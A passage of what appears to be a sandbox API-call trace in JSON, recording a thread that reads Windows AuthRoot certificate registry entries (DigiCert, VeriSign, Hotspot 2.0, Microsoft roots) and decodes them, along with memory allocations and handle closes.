\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x05c\\xb8c\rb\\xd7Z\\xbb\\xc8\\xab\\x1eK\\xdf\\xb5\\xa8\\x99\\xb2MC\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O_\\x10i09\\x8d\t\\x10{@\\xc3\\xc7\\xca\\x8f\\x1c\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x12\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00E\\xeb\\xa2\\xaf\\xf4\\x92\\xcb\\x821-Q\\x8b\\xa7\\xa7!\\x9d\\xf3m\\xc8\\x0fb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00>\\x90\\x99\\xb5\\x01^\\x8fHl\\x00\\xbc\\xea\\x9d\\x11\\x1e\\xe7!\\xfa\\xba5Z\\x89\\xbc\\xf1\\xdfiV\\x1e=\\xc62\\\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00m\\xca[\\xd0\r\\xcf\\x1c\\x0f2pY\\xd3t\\xb2\\x9c\\xa6\\xe3\\xc5\n\\xa6 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xbb\\x03\\x00\\x000\\x82\\x03\\xb70\\x82\\x02\\x9f\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xe7\\xe0\\xe5\\x17\\xd8F\\xfe\\x8f\\xe5`\\xfc\\x1b\\xf0090\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1$0\"\\x06\\x03U\\x04\\x03\\x13\\x1bDigiCert Ass" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob" + } + ], + "repeated": 0, + "id": 1570 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1571 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00561000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1572 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x03\\xb70\\x82\\x02\\x9f\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xe7\\xe0\\xe5\\x17\\xd8F\\xfe\\x8f\\xe5`\\xfc\\x1b\\xf0090\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1$0\"\\x06\\x03U\\x04\\x03\\x13\\x1bDigiCert Assured ID Root CA0\\x1e\\x17\r061110000000Z\\x17\r311110000000Z0e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1$0\"\\x06\\x03U\\x04\\x03\\x13" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1573 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 1574 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "4F65566336DB6598581D584A596C87934D5F2AB4" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4" + } + ], + "repeated": 0, + "id": 1575 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4\\Blob" + } + ], + "repeated": 1, + "id": 1576 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xf1\\xbb\\xac-\\x908\\xdd\\xec\\x8d\\xb1s\\xc5;\\xc7**\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00x*\\x02\\xdf\\xdb.\\x14\\xd5\\xa7_\n\\xdf\\xb6\\x8e\\x9c]\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x008\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 \\x00C\\x00A\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00OeVc6\\xdbe\\x98X\\x1dXJYl\\x87\\x93M_*\\xb4\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00A\\x02\\x00\\x000\\x82\\x02=0\\x82\\x01\\xa6\\x02\\x11\\x00\\xe4\\x9e\\xfd\\xf3:\\xe8\\x0e\\xcf\\xa5\\x11>\\x19\\xa4$\\x0220\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r040107235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriS" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4\\Blob" + } + ], + "repeated": 0, + "id": 1577 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1578 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x02=0\\x82\\x01\\xa6\\x02\\x11\\x00\\xe4\\x9e\\xfd\\xf3:\\xe8\\x0e\\xcf\\xa5\\x11>\\x19\\xa4$\\x0220\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r040107235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certificati" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1579 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 1580 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "51501FBFCE69189D609CFAF140C576755DCC1FDF" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF" + } + ], + "repeated": 0, + "id": 1581 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob" + } + ], + "repeated": 1, + "id": 1582 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00562000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1583 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O\\xcb\\x14\\xf7\\xc4\\xa3\\x8f/&\\\\x1f\\x12\\xc9\\xafVw\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xbeR\\xe4a\\xb1}\\xd6%'q%\\x1bE\\xe9\\x8f\\x122\\xca\\xa1%\\x12\\xdcy\\x11\\x8d\\x0c_\\xces\\xa5M\\x95\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00>\\x00\\x00\\x00H\\x00o\\x00t\\x00s\\x00p\\x00o\\x00t\\x00 \\x002\\x00.\\x000\\x00 \\x00T\\x00r\\x00u\\x00s\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x000\\x003\\x00\\x00\\x00b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xa3\\xcchY]\\xfe~\\x86\\xd8\\xad\\x17r\\xa8\\xb5(J\\xddT\\xac\\xe3\\xb8\\xa7\\x98\\xdfG\\xbc\\xca\\xfb\\x1f\\xdb\\x84\\xdf\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x000\\x1e\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00g\\x0eI,a\\x17\\x9e\\xeb\\xed\\xe0T\\xe7\\x84\\xd9\\x9b\\xadd`se\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00[\\xcb\\x93\\xea\\xdb}mO\\xb7\\xa0\n/:\\xe5\\x03\\x0c\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00QP\\x1f\\xbf\\xcei\\x18\\x9d`\\x9c\\xfa\\xf1@\\xc5vu]\\xcc\\x1f\\xdf\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xeb\\x15w\\xb4\\x0b<\\x8b\\xab\\xae4m\\xd9\\x8e\\xad\\x07\\x80\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00p\\x05\\x00\\x000\\x82\\x05l0\\x82\\x03T\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xb3\\x0fp\\xf2\\x86\\xa43\\xe0\\xb9\t\\x89\\xde\\x01\\xed\\xb70\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000P1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x180\\x16\\x06\\x03U\\x04\n\\x13\\x0fWFA Hotspot 2.01'0%\\x06\\x03U\\x04\\x03" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob" + } + ], + "repeated": 0, + "id": 1584 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1585 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x05l0\\x82\\x03T\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xb3\\x0fp\\xf2\\x86\\xa43\\xe0\\xb9\t\\x89\\xde\\x01\\xed\\xb70\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000P1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x180\\x16\\x06\\x03U\\x04\n\\x13\\x0fWFA Hotspot 2.01'0%\\x06\\x03U\\x04\\x03\\x13\\x1eHotspot 2.0 Trust Root CA - 030\\x1e\\x17\r131208120000Z\\x17\r431208120000Z0P1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x180\\x16\\x06\\x03U\\x04\n\\x13\\x0fWFA Hotspot 2.01'0%\\x06\\x03U\\x04\\x03\\x13\\x1eHotspot 2.0 Trust Root CA - 030\\x82\\x02\"0\r\\x06\t*\\x86H\\x86\\xf7\r" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1586 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "Index", + "value": "3" + } + ], + "repeated": 0, + "id": 1587 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74" + } + ], + "repeated": 0, + "id": 1588 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob" + } + ], + "repeated": 1, + "id": 1589 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00563000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1590 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x9ds\\x93y;\\xca2@1u\\xdc\\x12~\\x0e\\xc1\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00s\\xa5\\xe6J;\\xff\\x83\\x16\\xff\\x0e\\xdc\\xcca\\x8a\\x90nN\\xaeMti\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x01\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00r\\xa4\\x91\\x950\\x9f\\xb94\\xd6\n\\x98\\xe4\\xecE\\x1al\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\t\\xcbY\\x7f\\x86\\xb2p\\x8f\\x1a\\xc39\\xe3\\xc0\\xd9\\xe9\\xbf\\xbbM\\xb2#\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x000\\x14\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xc7A\\xf7\\x0fK*\\x8d\\x88\\xbf.q\\xc1A\"\\xefS\\xef\\x10\\xeb\\xa0\\xcf\\xa5\\xe6L\\xfa \\xf4\\x18\\x850s\\xe0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00S\\x00A\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x007\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00A3\\xc4\\xe6\\x0f\\xa1\\x83\\xee^zD\\x16\\xc5\\xd5L3\\x92\\xc5l/W()\\xbfY4tg\\xba\\xb0{\\xcd\\xcf\\x84\\x01b\\x98\\x83A\\xd2\\xd2\\x84\\xfb\\xd8V\\xdfS\\xb1 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xac\\x05\\x00\\x000\\x82\\x05\\xa80\\x82\\x03\\x90\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x1e\\xd3\\x97\t_\\xd8\\xb4\\xb3Gp\\x1e\\xaa\\xbe\\x7fE\\xb30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0c\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1604\\x06\\x03U\\x04\\x03\\x13-Microsof" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob" + } + ], + "repeated": 0, + "id": 1591 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1592 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x05\\xa80\\x82\\x03\\x90\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x1e\\xd3\\x97\t_\\xd8\\xb4\\xb3Gp\\x1e\\xaa\\xbe\\x7fE\\xb30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0c\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1604\\x06\\x03U\\x04\\x03\\x13-Microsoft RSA Root Certificate Authority 20170\\x1e\\x17\r191218225122Z\\x17\r420718230023Z0e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1604\\x06\\x03U\\x04\\x03\\x13-Microsoft RSA Roo" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1593 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "Index", + "value": "4" + } + ], + "repeated": 0, + "id": 1594 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "742C3192E607E424EB4549542BE1BBC53E6174E2" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2" + } + ], + "repeated": 0, + "id": 1595 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": 